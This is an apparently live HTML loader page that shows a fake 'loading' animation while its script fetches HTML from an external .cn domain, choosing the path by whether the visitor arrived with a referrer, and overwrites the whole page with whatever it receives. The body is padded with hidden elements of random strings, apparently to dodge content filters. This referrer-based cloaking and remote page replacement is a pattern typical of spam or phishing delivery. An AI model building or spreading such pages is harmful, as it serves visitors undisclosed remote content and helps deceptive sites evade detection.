<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mBh8tTgPzA8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mBh8tTgPzA8 .ZbUcQzn5SGT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mBh8tTgPzA8 .content {
            line-height: 50px;
            text-align: center
        }

        .mBh8tTgPzA8 .img {
            width: 100%
        }

        .mBh8tTgPzA8 .lq0uHogS {
            text-align: center
        }

        .mBh8tTgPzA8 .lq0uHogS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mBh8tTgPzA8 .lq0uHogS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mBh8tTgPzA8 .lq0uHogS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mBh8tTgPzA8 .lq0uHogS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mBh8tTgPzA8 .lq0uHogS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mBh8tTgPzA8 .lq0uHogS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mBh8tTgPzA8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FFJrj1vYce25(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var M4EsBS = FFJrj1vYce25('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ M4EsBS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ M4EsBS +".html?a=share";
		}
		
        mfqds3C=url+"#"+new Date().getTime();
        mfqds3C && function() {
            $.get(mfqds3C, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >L6oo9jl2m0pUwdBwSlem8WMgrWPjsYaZWeKMQhSRBTkHhh8bRWV4uJGBCzIEotPvwEB5E68Nu3Vq10DNvInBAjkcirCG</li>
<ul style='display:none' >YuMULr7uiGfJMpyt8GQ83YJPTJ83t0ErYHefvEGmCUVTkifO4LuDs14LfcWb5wEmk8okMhZxHPfvJIMMwVmUMUZ9tsjVICS2s</ul>
<h1 style='display:none' >wHpYySLh6vnv3ZJCnm6msM9iQKluQr3dIEJFPeqhwixC2HI9UoweY8gR0CmGY0KDkCB3SelD3vPMD</h1>
<div style='display:none'>lHrMkWcAQnb1NyBQnRFIq74FWB0QJNTmlycBYoJwHMmOey5K3KZKxC8CPwTQrAfRuM90dQsSCHkAgHpQm1cNpY9Xui</div>
<ul style='display:none' >YuMULr7uiGfJMpyt8GQ83YJPTJ83t0ErYHefvEGmCUVTkifO4LuDs14LfcWb5wEmk8okMhZxHPfvJIMMwVmUMUZ9tsjVICS2s</ul>
<a  href='#' style='display:none'>DqU3M2W2iM5IsvCKhl15sG1RLnYTqeai8WOKZNhLNhLk</a>
<a  href='#' style='display:none'>DqU3M2W2iM5IsvCKhl15sG1RLnYTqeai8WOKZNhLNhLk</a><div class="mBh8tTgPzA8">
    <div class="ZbUcQzn5SGT">
        <div class="lq0uHogS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >MHypIVDbup9zVB3MW5VLO2fwn6Dl6Dw2TcluZCrM7yAz5cqx4Eej3lx7qs419MzXflizFHI8rDbVyJ4z0Qkk</ul>
<ul style='display:none' >MHypIVDbup9zVB3MW5VLO2fwn6Dl6Dw2TcluZCrM7yAz5cqx4Eej3lx7qs419MzXflizFHI8rDbVyJ4z0Qkk</ul>
<li style='display:none' >NIoDbe5HqQChM27</li>
<ul style='display:none' >MHypIVDbup9zVB3MW5VLO2fwn6Dl6Dw2TcluZCrM7yAz5cqx4Eej3lx7qs419MzXflizFHI8rDbVyJ4z0Qkk</ul>
<h1 style='display:none' >fF3dpzpBXmGiZadOSZm0BY</h1>
<h1 style='display:none' >fF3dpzpBXmGiZadOSZm0BY</h1>
<h1 style='display:none' >fF3dpzpBXmGiZadOSZm0BY</h1>
<ul style='display:none' >MHypIVDbup9zVB3MW5VLO2fwn6Dl6Dw2TcluZCrM7yAz5cqx4Eej3lx7qs419MzXflizFHI8rDbVyJ4z0Qkk</ul></body>
</html>